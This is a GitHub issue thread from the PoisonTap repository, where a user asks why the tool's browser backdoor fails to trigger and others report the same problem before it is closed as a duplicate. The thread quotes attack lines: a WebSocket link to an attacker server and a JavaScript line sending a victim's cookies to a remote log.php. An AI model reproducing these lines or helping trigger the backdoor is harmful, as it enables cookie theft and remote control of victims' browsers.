samyk/poisontap #32: The back door does not work

zjq777007, 2016-11-21:
I have setup poisontap in my nethunter nexus6p,when i plug into my win8.1 usb port,all network traffic is goto nexus6p,and phone screen can see my browser cookie.(eg youku.com)
i have modify the backdoor.html:
var socket = new WebSocket('ws://192.168.0.107:1337');
to
var socket = new WebSocket('ws://my IP:1337');

and modify the target_backdoor.js:
new Image().src='http://192.168.0.107/log.php?log='+document.cookies;
to
new Image().src='http://my IP/log.php?log='+document.cookies;
my online server is running backend_server.js listening port 1337 succesed and log.php is work
but when i use command http://my IP:1337/exec?alert("muahahahaha")  (ps."my IP" is my server ip)
My browser nothing happened,why?
and When I visit the list of URLs in target_injected_xhtmljs.html
browser will jump to your video in the interface,What does it do?

How to trigger backdoor?   thx!

emboha, 2016-12-01:
I'm in the exact same spot as u.

zjq777007, 2016-12-02:
@emboha No,I am wait author to solve my problem too

grimxd, 2016-12-02:
I am having the same issue. There is no websocket opened either with PI connected or disconnected from target PC.

samyk, 2016-12-02:
Dupe of #29, more details in there

closed 2016-12-02 by samyk